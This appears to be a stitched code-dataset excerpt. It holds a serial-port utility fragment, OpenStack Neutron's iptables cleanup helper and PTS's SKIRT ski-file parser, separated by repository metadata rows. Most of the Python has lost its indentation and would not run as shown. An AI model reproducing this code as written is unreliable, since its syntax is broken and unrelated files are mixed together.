Return the list of available serial port names.
"""
plist = list(serial.tools.list_ports.comports())
result = []
if len(plist) > 0:
for p in list(plist):
result.append(p[0])
return result
def open_port(ss, bps):
"""
Open a serial port with the given device name and baud rate.
"""
port = None
try:
port = serial.Serial(ss, bps)
if port.is_open:
# log_print("Serial port opened successfully: " + str(ss))
pass
else:
log_print("Failed to open serial port: " + str(ss))
except Exception:
log_print("Failed to open serial port: " + str(ss))
return port
def close_port(port):
"""
Close the serial port.
"""
try:
port.close()
except Exception:
log_print("串口关闭失败:" + str(port))
def hex_str(argv):
"""
Render a byte sequence as space-separated hexadecimal pairs.
"""
result = ''
try:
hLen = len(argv)
for i in range(hLen):
hvol = argv[i]
hhex = '%02X'%hvol
result += hhex+' '
except:
pass
return result
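# Illustrative sketch (not part of this module; the function name and frame
# bytes are hypothetical): hex_str() renders a byte buffer as space-separated,
# upper-case hex pairs with a trailing space.
def _hex_str_sketch():
    frame = bytes([0x01, 0x03, 0x00, 0x10, 0xAB])
    assert hex_str(frame) == "01 03 00 10 AB "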
| 17.183908
| 54
| 0.543813
|
c2ac8f5f7f823ee60760004cd40907079115fd55
| 3,589
|
py
|
Python
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 1
|
2018-10-19T01:48:37.000Z
|
2018-10-19T01:48:37.000Z
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
neutron/agent/linux/openvswitch_firewall/iptables.py
|
knodir/neutron
|
ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import constants as n_const
def get_device_port_name(port_id):
return ('qvo' + port_id)[:n_const.LINUX_DEV_LEN]
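# Illustrative sketch (not part of this module; all values are hypothetical):
# hybrid ports get a 'qvo' prefix and are truncated so the name fits the Linux
# interface-name limit. LINUX_DEV_LEN is assumed to be 14 here; the real
# function uses n_const.LINUX_DEV_LEN.
def _device_port_name_sketch():
    port_id = "3fcb4e7a-9d01-4b2e-8f31-000000000000"  # hypothetical port UUID
    name = ('qvo' + port_id)[:14]
    assert name == "qvo3fcb4e7a-9d"
    assert len(name) <= 15  # kernel IFNAMSIZ leaves 15 usable characters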
def get_iptables_driver_instance():
"""Load hybrid iptables firewall driver."""
from neutron.agent.linux import iptables_firewall
class HybridIptablesHelper(
iptables_firewall.OVSHybridIptablesFirewallDriver):
"""Don't remove conntrack when removing iptables rules."""
def _remove_conntrack_entries_from_port_deleted(self, port):
pass
return HybridIptablesHelper()
def is_bridge_cleaned(bridge):
other_config = bridge.db_get_val(
'Bridge', bridge.br_name, 'other_config')
return other_config.get(Helper.CLEANED_METADATA, '').lower() == 'true'
class Helper(object):
"""Helper to avoid loading firewall driver.
The main purpose is to avoid loading iptables driver for cases where no
ports have hybrid plugging on given node.
The helper stores metadata for iptables cleanup into br-int ovsdb Bridge
table. Specifically it checks for other_config['iptables_cleaned'] boolean
value.
"""
HYBRID_PORT_PREFIX = 'qvo'
CLEANED_METADATA = 'iptables_cleaned'
def __init__(self, int_br):
self.int_br = int_br
self.hybrid_ports = None
self.iptables_driver = None
def load_driver_if_needed(self):
self.hybrid_ports = self.get_hybrid_ports()
if self.hybrid_ports and self.has_not_been_cleaned:
self.iptables_driver = get_iptables_driver_instance()
def get_hybrid_ports(self):
"""Return True if there is a port with hybrid plugging."""
return {
port_name for port_name in self.int_br.get_port_name_list()
if port_name.startswith(self.HYBRID_PORT_PREFIX)}
def cleanup_port(self, port):
if not self.iptables_driver:
return
device_name = get_device_port_name(port['device'])
try:
self.hybrid_ports.remove(device_name)
except KeyError:
# It's not a hybrid plugged port
return
# TODO(jlibosva): Optimize, add port to firewall without installing
# iptables rules and then call remove from firewall
self.iptables_driver.prepare_port_filter(port)
self.iptables_driver.remove_port_filter(port)
if not self.hybrid_ports:
self.mark_as_cleaned()
# Let GC remove iptables driver
self.iptables_driver = None
@property
def has_not_been_cleaned(self):
return not is_bridge_cleaned(self.int_br)
def mark_as_cleaned(self):
# TODO(jlibosva): Make it a single transaction
other_config = self.int_br.db_get_val(
'Bridge', self.int_br.br_name, 'other_config')
other_config[self.CLEANED_METADATA] = 'true'
self.int_br.set_db_attribute(
'Bridge', self.int_br.br_name, 'other_config', other_config)
| 35.534653
| 78
| 0.691
|
3d9ece2126d008e0106390a6ec2bb6b010731a0f
| 106,185
|
py
|
Python
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 7
|
2016-05-20T21:56:39.000Z
|
2022-02-07T21:09:48.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2019-03-21T16:10:04.000Z
|
2019-03-22T17:21:56.000Z
|
CAAPR/CAAPR_AstroMagic/PTS/pts/core/simulation/skifile.py
|
wdobbels/CAAPR
|
50d0b32642a61af614c22f1c6dc3c4a00a1e71a3
|
[
"MIT"
] | 1
|
2020-05-19T16:17:17.000Z
|
2020-05-19T16:17:17.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.simulation.skifile Reading and updating a SKIRT parameter file.
#
# An instance of the SkiFile class in this module allows reading from and updating an existing ski file.
# -----------------------------------------------------------------
# Import standard modules
import os.path
import copy
from datetime import datetime
from lxml import etree
from numpy import arctan
import warnings
# Import the relevant PTS classes and modules
from .units import SkirtUnits
from ..basics.filter import Filter
from ..tools import archive as arch
# -----------------------------------------------------------------
# SkiFile class
# -----------------------------------------------------------------
## An instance of the SkiFile class represents a particular existing SKIRT parameter file (\em ski file).
# There are functions to read and/or update certain information in the ski file, such as obtaining or setting
# the value of a particular parameter. The intention is to encapsulate any knowledge about the ski file format
# and structure within this class, concentrating the update pain if and when that format changes.
# Consequently the public functions in this class are quite high-level, and specific rather than generic.
#
# Updates made to a SkiFile instance do \em not affect the underlying file; use the saveto() function to save
# the updated contents of a SkiFile instance to another file (or to replace the original file if so desired).
#
# A SkiFile class instance is always constructed from an existing ski file; creating a new ski file from scratch
# is not supported. To create a new ski file, start SKIRT in interactive mode (without any arguments).
#
class SkiFile:
# ---------- Constructing and saving -----------------------------
## The constructor loads the contents of the specified ski file into a new SkiFile instance.
# The filename \em must end with ".ski" or with "_parameters.xml".
#
def __init__(self, filepath):
if not filepath.lower().endswith((".ski","_parameters.xml")):
raise ValueError("Invalid filename extension for ski file")
# Set the path to the ski file
self.path = os.path.expanduser(filepath)
# load the XML tree (remove blank text to avoid confusing the pretty printer when saving)
self.tree = etree.parse(arch.opentext(self.path), parser=etree.XMLParser(remove_blank_text=True))
# Replace path by the full, absolute path
self.path = os.path.abspath(self.path)
## This function saves the (possibly updated) contents of the SkiFile instance into the specified file.
# The filename \em must end with ".ski". Saving to and thus replacing the ski file from which this
# SkiFile instance was originally constructed is allowed, but often not the intention.
def saveto(self, filepath):
if not filepath.lower().endswith(".ski"):
raise ValueError("Invalid filename extension for ski file")
# update the producer and time attributes on the root element
root = self.tree.getroot()
root.set("producer", "Python Toolkit for SKIRT (SkiFile class)")
root.set("time", datetime.now().strftime("%Y-%m-%dT%H:%M:%S"))
# serialize the XML tree
outfile = open(os.path.expanduser(filepath), "wb")
outfile.write(etree.tostring(self.tree, encoding="UTF-8", xml_declaration=True, pretty_print=True))
outfile.close()
# Update the ski file path
self.path = filepath
## This function saves the ski file to the original path
def save(self): self.saveto(self.path)
## This function returns a copy (a deep copy) of this ski file
def copy(self):
ski = copy.deepcopy(self)
ski.path = None # set the path to None so this copy won't be involuntarily saved over the original file
return ski
# ---------- Retrieving information -------------------------------
## This function returns a SkirtUnits object initialized with the SKIRT unit system ('SI', 'stellar', or
# 'extragalactic') and the flux style ('neutral', 'wavelength' or 'frequency') specified in the ski file.
def units(self):
unitelements = self.tree.xpath("//units/*[1]")
if len(unitelements) == 1:
unitsystem = unitelements[0].tag
fluxstyle = unitelements[0].get("fluxOutputStyle", default='neutral')
else:
unitsystem = 'extragalactic'
fluxstyle = 'neutral'
return SkirtUnits(unitsystem, fluxstyle)
## This function returns the number of wavelengths for oligochromatic or panchromatic simulations
def nwavelengths(self):
# Try to get the list of wavelengths from the ski file
wavelengths = self.wavelengths()
# If the list is not empty, return its size
if wavelengths: return len(wavelengths)
# If the list is empty, the ski file either represents a panchromatic simulation (and we can get the
# number of points directly from the tree) or a FileWavelengthGrid is used (in which case we raise an error)
entry = self.tree.xpath("//wavelengthGrid/*[1]")[0]
if entry.tag == 'FileWavelengthGrid':
raise ValueError("The number of wavelengths is not defined within the ski file. Call nwavelengthsfile().")
else:
return int(entry.get("points"))
## This function returns the name of the wavelengths file that is used for the simulation, if any
def wavelengthsfile(self):
entry = self.tree.xpath("//FileWavelengthGrid")
if entry: return entry[0].get("filename")
else: return None
## This function returns the number of wavelength points as defined in the wavelengths file
def nwavelengthsfile(self, input_path):
wavelengths_filename = self.wavelengthsfile()
wavelengths_path = os.path.join(input_path, wavelengths_filename)
with open(wavelengths_path, 'r') as f: first_line = f.readline()
nwavelengths = int(first_line.split("\n")[0])
return nwavelengths
## This function returns the number of photon packages per wavelength
def packages(self):
# Get the MonteCarloSimulation element
elems = self.tree.xpath("//OligoMonteCarloSimulation | //PanMonteCarloSimulation")
if len(elems) != 1: raise ValueError("No MonteCarloSimulation in ski file")
# Get the number of packages
return int(float(elems[0].get("packages")))
## This function returns the number of dust cells
def ncells(self):
xpoints = self.nxcells()
ypoints = 1
zpoints = 1
try:
ypoints = self.nycells()
except ValueError: pass
try:
zpoints = self.nzcells()
except ValueError: pass
# Return the total number of dust cells
return xpoints*ypoints*zpoints
## This function returns the number of dust cells in the x direction
def nxcells(self):
try:
xpoints = int(self.tree.xpath("//meshX/*")[0].get("numBins"))
except TypeError:
raise ValueError("The number of dust cels is not defined within the ski file")
return xpoints
## This function returns the number of dust cells in the y direction
def nycells(self):
try:
ypoints = int(self.tree.xpath("//meshY/*")[0].get("numBins"))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 2")
return ypoints
## This function returns the number of dust cells in the z direction
def nzcells(self):
try:
zpoints = int(self.tree.xpath("//meshZ/*")[0].get("numBins"))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 3")
return zpoints
## This function returns the dimension of the dust grid
def dimension(self):
# Try to find the number of points in the y direction
try:
int(self.tree.xpath("//dustGridStructure/*[1]")[0].get("pointsY"))
except TypeError:
return 1
# Try to find the number of points in the z direction
try:
int(self.tree.xpath("//dustGridStructure/*[1]")[0].get("pointsZ"))
except TypeError:
return 2
# If finding the number of ypoints and zpoints succeeded, the grid is 3-dimensional
return 3
## This function returns the number of dust components
def ncomponents(self):
components = self.tree.xpath("//CompDustDistribution/components/*")
return int(len(components))
## This function returns the number of dust library items
def nlibitems(self):
dustlib = self.tree.xpath("//dustLib/*")[0]
if dustlib.tag == "AllCellsDustLib":
return self.ncells()
elif dustlib.tag == "Dim2DustLib":
return dustlib.attrib["pointsTemperature"] * dustlib.attrib["pointsWavelength"]
elif dustlib.tag == "Dim1DustLib":
return dustlib.attrib["entries"]
## This function returns the number of dust populations (from all dust mixes combined)
def npopulations(self):
npops = 0
# For each dust mix
for dustmix in self.tree.xpath("//mix/*[1]"):
if dustmix.tag in ["InterstellarDustMix", "Benchmark1DDustMix", "Benchmark2DDustMix", "DraineLiDustMix"]:
npops += 1
elif dustmix.tag == "TrustDustMix":
npops += int(dustmix.attrib["graphitePops"])
npops += int(dustmix.attrib["silicatePops"])
npops += int(dustmix.attrib["PAHPops"])
elif dustmix.tag == "ConfigurableDustMix":
npops += len(self.tree.xpath("//ConfigurableDustMix/populations/*"))
return npops
## This function returns the number of simple instruments
def nsimpleinstruments(self):
return len(self.tree.xpath("//SimpleInstrument"))
## This function returns the number of full instruments
def nfullinstruments(self):
return len(self.tree.xpath("//FullInstrument"))
## This function returns whether transient heating is enabled
def transientheating(self):
return len(self.tree.xpath("//TransientDustEmissivity")) > 0
## This function returns whether dust emission is enabled
def dustemission(self):
return len(self.tree.xpath("//dustEmissivity"))
@property
def emission_boost(self):
try:
pandustsystem = self.tree.xpath("//PanDustSystem")[0]
return float(pandustsystem.attrib["emissionBoost"])
except:
raise ValueError("Not a panchromatic simulation")
## This function returns whether dust selfabsorption is enabled
def dustselfabsorption(self):
try:
pandustsystem = self.tree.xpath("//PanDustSystem")[0]
return (pandustsystem.attrib["selfAbsorption"] == "true")
except:
return False
## This function returns whether data parallelization is enabled
def dataparallel(self):
return False # Not merged into the main SKIRT version yet
def enable_selfabsorption(self):
# Get the dust system
dust_system = self.get_dust_system()
# Check if the dust system is of type 'PanDustSystem'
if dust_system.tag != "PanDustSystem": raise ValueError("Not a panchromatic simulation")
# Enable dust self-absorption
dust_system.set("selfAbsorption", "true")
def disable_selfabsorption(self):
# Get the dust system
dust_system = self.get_dust_system()
# Check if the dust system is of type 'PanDustSystem'
if dust_system.tag != "PanDustSystem": raise ValueError("Not a panchromatic simulation")
# Disable dust self-absorption
dust_system.set("selfAbsorption", "false")
def enable_all_dust_system_writing_options(self):
# Get the dust system
dust_system = self.get_dust_system()
# Loop over all elements of the dust system
for element in dust_system.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to true
element.set(setting_name, "true")
def set_write_convergence(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeConvergence' setting to true
dust_system.set("writeConvergence", str_from_bool(value))
def set_write_density(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeDensity' setting to true
dust_system.set("writeDensity", str_from_bool(value))
def set_write_depth_map(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeDepthMap' setting to true
dust_system.set("writeDepthMap", str_from_bool(value))
def set_write_quality(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeQuality' setting to true
dust_system.set("writeQuality", str_from_bool(value))
def set_write_cell_properties(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeCellProperties' setting to true
dust_system.set("writeCellProperties", str_from_bool(value))
def set_write_stellar_density(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeStellarDensity' setting to true
dust_system.set("writeStellarDensity", str_from_bool(value))
def set_write_cells_crossed(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeCellsCrossed' setting to true
dust_system.set("writeCellsCrossed", str_from_bool(value))
def set_write_emissivity(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeEmissivity' setting to true
dust_system.set("writeEmissivity", str_from_bool(value))
def set_write_temperature(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeTemperature' setting to true
dust_system.set("writeTemperature", str_from_bool(value))
def set_write_isrf(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeISRF' setting to true
dust_system.set("writeISRF", str_from_bool(value))
def set_write_absorption(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeAbsorption' setting to the specified value
dust_system.set("writeAbsorption", str_from_bool(value))
def set_write_grid(self, value=True):
# Get the dust grid
grid = self.get_dust_grid()
# Set the 'writeGrid' setting to the specified value
grid.set("writeGrid", str_from_bool(value))
def disable_all_dust_system_writing_options(self):
# Get the dust system
dust_system = self.get_dust_system()
# Loop over all elements of the dust system
for element in dust_system.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to false
element.set(setting_name, "false")
def enable_all_writing_options(self):
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to true
element.set(setting_name, "true")
def disable_all_writing_options(self):
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to false
element.set(setting_name, "false")
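## Example (illustrative sketch): with an instance 'ski' of this class, all output can be switched
#  off before a production run and only the desired maps re-enabled afterwards:
#
#      ski.disable_all_writing_options()
#      ski.set_write_temperature(True)   # keep the dust temperature output
#      ski.set_write_grid(True)          # and the dust grid data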
## This function returns the number of pixels for each of the instruments
def npixels(self, nwavelengths=None):
pixels = []
nwavelengths = nwavelengths if nwavelengths is not None else self.nwavelengths()
instruments = self.tree.xpath("//instruments/*")
for instrument in instruments:
type = instrument.tag
name = instrument.attrib["instrumentName"]
datacube = int(instrument.attrib["pixelsX"])*int(instrument.attrib["pixelsY"])*nwavelengths
if type == "SimpleInstrument":
pixels.append([name, type, datacube])
elif type == "FullInstrument":
scattlevels = int(instrument.attrib["scatteringLevels"])
scattering = scattlevels + 1 if scattlevels > 0 else 0
dustemission = 1 if self.dustemission() else 0
npixels = datacube * (3 + scattering + dustemission)
pixels.append([name, type, npixels])
return pixels
## This function returns a list of the wavelengths specified in the ski file for an oligochromatic simulation,
# in micron. If the ski file specifies a panchromatic simulation, the function returns an empty list.
# The current implementation requires that the wavelengths in the ski file are specified in micron.
def wavelengths(self):
# get the value of the wavelengths attribute on the OligoWavelengthGrid element (as a list of query results)
results = self.tree.xpath("//OligoWavelengthGrid/@wavelengths")
# if not found, return an empty list
if len(results) != 1: return []
# split the first result in separate strings, extract the numbers using the appropriate units
units = self.units()
return [units.convert(s,to_unit='micron',quantity='wavelength') for s in results[0].split(",")]
## This function returns the first instrument's distance, in the specified units (default is 'pc').
def instrumentdistance(self, unit='pc'):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
# get the distance including the unit string
distance = instruments[0].get("distance")
# convert to requested units
return self.units().convert(distance, to_unit=unit, quantity='distance')
## This function returns the shape of the first instrument's frame, in pixels.
def instrumentshape(self):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
# get its shape
return ( int(instruments[0].get("pixelsX")), int(instruments[0].get("pixelsY")) )
## This function returns the angular area (in sr) of a single pixel in the first instrument's frame.
def angularpixelarea(self):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
instrument = instruments[0]
# get the distance in m
d = self.units().convert(instrument.get("distance"), to_unit='m', quantity='distance')
# get the field of view in m
fovx = self.units().convert(instrument.get("fieldOfViewX"), to_unit='m', quantity='length')
fovy = self.units().convert(instrument.get("fieldOfViewY"), to_unit='m', quantity='length')
# get the number of pixels
nx = int(instrument.get("pixelsX"))
ny = int(instrument.get("pixelsY"))
# calculate the angular pixel area
sx = 2 * arctan(fovx / nx / d / 2)
sy = 2 * arctan(fovy / ny / d / 2)
return sx * sy
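## Worked example for the angular pixel area (numbers are illustrative): a 30 kpc field of view
#  imaged with 300 pixels from a distance of 10 Mpc gives sx = sy = 2*arctan(30 kpc / 300 / 10 Mpc / 2)
#  ~ 1e-5 rad per pixel, so the pixel solid angle is sx*sy ~ 1e-10 sr. In this regime the small-angle
#  approximation sx ~ fovx/(nx*d) yields essentially the same value.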
## This function returns a list of instrument names, in order of occurrence in the ski file.
def instrumentnames(self):
# get the instrument elements
instruments = self.tree.xpath("//instruments/*")
# return their names
return [ instr.get("instrumentName") for instr in instruments ]
## This function returns the dust fraction specified in an SPHDustDistribution,
# or 0 if the element or the attribute are not present.
def dustfraction(self):
# get the value of the relevant attribute on the SPHDustDistribution element (as a list of query results)
results = self.tree.xpath("//SPHDustDistribution/@dustFraction")
# if not found, return zero
if len(results) != 1: return 0
# convert the first result
return float(results[0])
## This function returns the maximum gas temperature specified in an SPHDustDistribution, in Kelvin,
# or 0 if the element or the attribute are not present.
def maximumtemperature(self):
# get the value of the relevant attribute on the SPHDustDistribution element (as a list of query results)
results = self.tree.xpath("//SPHDustDistribution/@maximumTemperature")
# if not found, return zero
if len(results) != 1: return 0
# extract the number from the first result, assuming units of K
return float(results[0].split()[0])
## This function returns whether the ski file describes an oligochromatic simulation
def oligochromatic(self):
elems = self.tree.xpath("//OligoMonteCarloSimulation")
return len(elems) > 0
## This function returns whether the ski file describes a panchromatic simulation
def panchromatic(self):
elems = self.tree.xpath("//PanMonteCarloSimulation")
return len(elems) > 0
## This function converts the ski file to a ski file that describes an oligochromatic simulation
def to_oligochromatic(self, wavelengths):
if self.oligochromatic(): warnings.warn("The simulation is already oligochromatic")
else:
simulation = self.tree.xpath("//PanMonteCarloSimulation")[0]
simulation.tag = "OligoMonteCarloSimulation"
# Remove the old wavelength grid
wavelength_grid = self.get_wavelength_grid()
parent = wavelength_grid.getparent()
parent.set("type", "OligoWavelengthGrid")
parent.remove(wavelength_grid)
# Make the oligochromatic wavelength grid
attrs = {"wavelengths": ", ".join(map(str_from_quantity, wavelengths))}
parent.append(parent.makeelement("OligoWavelengthGrid", attrs))
components = self.get_stellar_components()
for component in components:
component.tag = "OligoStellarComp"
component.set("luminosities", "1")
for child in component.getchildren():
if child.tag == "sed" or child.tag == "normalization": component.remove(child)
dust_system = self.get_dust_system()
parent = dust_system.getparent()
parent.set("type", "OligoDustSystem")
dust_system.tag = "OligoDustSystem"
dust_system.attrib.pop("writeAbsorption")
dust_system.attrib.pop("writeISRF")
dust_system.attrib.pop("writeTemperature")
dust_system.attrib.pop("writeEmissivity")
dust_system.attrib.pop("selfAbsorption")
dust_system.attrib.pop("emissionBoost")
for child in dust_system.getchildren():
if child.tag == "dustEmissivity" or child.tag == "dustLib": dust_system.remove(child)
## This function converts the ski file to a ski file that describes a panchromatic simulation
def to_panchromatic(self):
if self.panchromatic(): warnings.warn("The simulation is already panchromatic")
else:
simulation = self.tree.xpath("//OligoMonteCarloSimulation")[0]
simulation.tag = "PanMonteCarloSimulation"
# ---------- Updating information ---------------------------------
## This function applies an XSLT transform to the ski file if an XPath condition evaluates to true.
# The first argument is a string specifying an XPath 1.0 expression to be evaluated in the context of the XML
# document representing the ski file; the expression value is converted to boolean according to XPath semantics.
# If the value is true, the XSLT 1.0 transform specified in the second argument is applied to the XML document,
# and the result replaces the original document. The second argument is a string containing one or more
# \<xsl:template\> elements that specify the changes to be applied to the document. The \<xsl:stylesheet\>
# element and the identity template are automatically added and must not be contained in the argument string.
# The function returns true if the transform was applied, and false if it was not (i.e. the document is unchanged).
def transformif(self, condition, templates):
needed = self.tree.xpath("boolean(" + condition + ")")
if needed:
prefix = '''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>'''
postfix = '''</xsl:stylesheet>'''
transform = etree.XSLT(etree.XML(prefix + templates + postfix))
self.tree = transform(self.tree)
return needed
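## Example (illustrative sketch; the element and attribute names are hypothetical): the call below
#  would rename the attribute 'oldName' to 'newName' on every 'SomeElement' element, but only if at
#  least one such attribute is present in the document:
#
#      ski.transformif("//SomeElement/@oldName",
#                      '''<xsl:template match="SomeElement/@oldName">
#                           <xsl:attribute name="newName"><xsl:value-of select="."/></xsl:attribute>
#                         </xsl:template>''')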
## This function sets the number of photon packages on the MonteCarloSimulation element in the ski file
# to the specified value
def setpackages(self, number):
# get the MonteCarloSimulation element
elems = self.tree.xpath("//OligoMonteCarloSimulation | //PanMonteCarloSimulation")
if len(elems) != 1: raise ValueError("No MonteCarloSimulation in ski file")
# set the attribute value
elems[0].set("packages", str(number))
## This function sets the number of wavelengths
def setnwavelengths(self, number):
elems = self.tree.xpath("//wavelengthGrid/*[1]")
elems[0].set("points", str(number))
## This function sets the number of dust cells in the x direction
def setxdustcells(self, number):
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsX", str(number))
## This function sets the number of dust cells in the y direction
def setydustcells(self, number):
try:
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsY", str(number))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 2")
## This function sets the number of dust cells in the z direction
def setzdustcells(self, number):
try:
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsZ", str(number))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 3")
## This function increases the number of photon packages by a certain factor
def increasepackages(self, factor):
# Set the increased number of packages
self.setpackages(self.packages()*factor)
## This function increases the number of dust cells by a certain factor
def increasedustcells(self, factor):
# Get the dimension of the dust grid
dimension = self.dimension()
# Set the increased number of dust cells in the x direction
self.setxdustcells(int(round(self.nxcells() * factor**(1 / float(dimension)))))
# Set the increased number of dust cells in the y direction
if dimension > 1: self.setydustcells(int(round(self.nycells() * factor**(1 / float(dimension)))))
# Set the increased number of dust cells in the z direction
if dimension > 2: self.setzdustcells(int(round(self.nzcells() * factor**(1 / float(dimension)))))
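## Example (illustrative): for a 3-dimensional grid, increasing the total number of dust cells by a
#  factor of 8 multiplies the number of cells along each axis by 8**(1/3) = 2:
#
#      ski.increasedustcells(8)     # e.g. a 100x100x100 grid becomes 200x200x200
#      ski.increasepackages(10)     # often combined with a larger number of photon packages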
## This function sets the maximum mass fraction of the tree dust grid in the ski file
# to the specified value
def setmaxmassfraction(self, number):
# get the tree dust grid element
elems = self.tree.xpath("//BinTreeDustGrid | //OctTreeDustGrid")
if len(elems) != 1: raise ValueError("No tree dust grid in ski file")
# set the attribute value
elems[0].set("maxMassFraction", str(number))
## This function sets the dust fraction of the SPH dust distribution in the ski file
# to the specified value
def setdustfraction(self, number):
# get the SPHDustDistribution element
elems = self.tree.xpath("//SPHDustDistribution")
if len(elems) != 1: raise ValueError("No SPHDustDistribution in ski file")
# set the attribute value
elems[0].set("dustFraction", str(number))
## This function replaces any instruments in the ski file by a new list of perspective instruments
# corresponding to the movie frames defined in the specified list. The instruments are named "0",
# "1", "2"... corresponding to the zero-based frame index in the list. Each frame is given as a tuple
# containing the following information: viewport shape (in pixels), viewport size, viewport position,
# crosshair position, upwards position, and focal length (all in world coordinates, expressed in the
# default units for length in the target ski file).
# The components of each item are grouped in tuples, so the structure of the complete list is:
# [ ((Nx,Ny),(Sx,Sy),(Vx,Vy,Vz),(Cx,Cy,Cz),(Ux,Uy,Uz),Fe) , ... ]
def setperspectiveinstruments(self, frames):
# get the instruments element
parents = self.tree.xpath("//instruments")
if len(parents) == 0: raise ValueError("No 'instruments' element in ski file")
if len(parents) > 1: raise ValueError("Multiple 'instruments' elements in ski file")
parent = parents[0]
# remove the old instruments
for instrument in parent.getchildren():
parent.remove(instrument)
# add a new instrument for each frame
index = 0
for pixels,size,view,cross,up,focal in frames:
attrs = { "instrumentName" : str(index),
"pixelsX" : str(pixels[0]), "pixelsY" : str(pixels[1]), "width" : str(size[0]),
"viewX" : str(view[0]), "viewY" : str(view[1]), "viewZ" : str(view[2]),
"crossX" : str(cross[0]), "crossY" : str(cross[1]), "crossZ" : str(cross[2]),
"upX" : str(up[0]), "upY" : str(up[1]), "upZ" : str(up[2]), "focal" : str(focal) }
parent.append(parent.makeelement("PerspectiveInstrument", attrs))
index += 1
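## Example (illustrative; all numbers are hypothetical and expressed in the ski file's default length
#  unit): a single 500x500 pixel perspective frame looking at the origin from the positive x axis:
#
#      frames = [ ((500,500), (1e4,1e4), (5e4,0,0), (0,0,0), (0,0,1), 1e3) ]
#      ski.setperspectiveinstruments(frames)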
## This function sets the filename attribute of the SPHStellarComp element to the specified value.
def setstarfile(self, filename):
# get the SPHStellarComp element
elems = self.tree.xpath("//SPHStellarComp[./sedFamily/BruzualCharlotSEDFamily]")
if len(elems) != 1: raise ValueError("No SPHStellarComp with BruzualCharlotSEDFamily in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets the filename attribute of the SPHStellarComp element with a MappingsSEDFamily (the starburst component) to the specified value.
def sethiifile(self, filename):
# get the SPHStarburstComp element
elems = self.tree.xpath("//SPHStellarComp[./sedFamily/MappingsSEDFamily]")
if len(elems) != 1: raise ValueError("No SPHStellarComp with MappingsSEDFamily in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets the filename attribute of the SPHDustDistribution element to the specified value.
def setgasfile(self, filename):
# get the SPHDustDistribution element
elems = self.tree.xpath("//SPHDustDistribution")
if len(elems) != 1: raise ValueError("No SPHDustDistribution in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets any extentX, extentY and extentZ attributes to the specified value (converted to a string),
# regardless of the element in which such attributes reside.
def setextent(self, value):
strvalue = str(value)
for attr in self.tree.xpath("//*/@extentX"): attr.getparent().set("extentX", strvalue)
for attr in self.tree.xpath("//*/@extentY"): attr.getparent().set("extentY", strvalue)
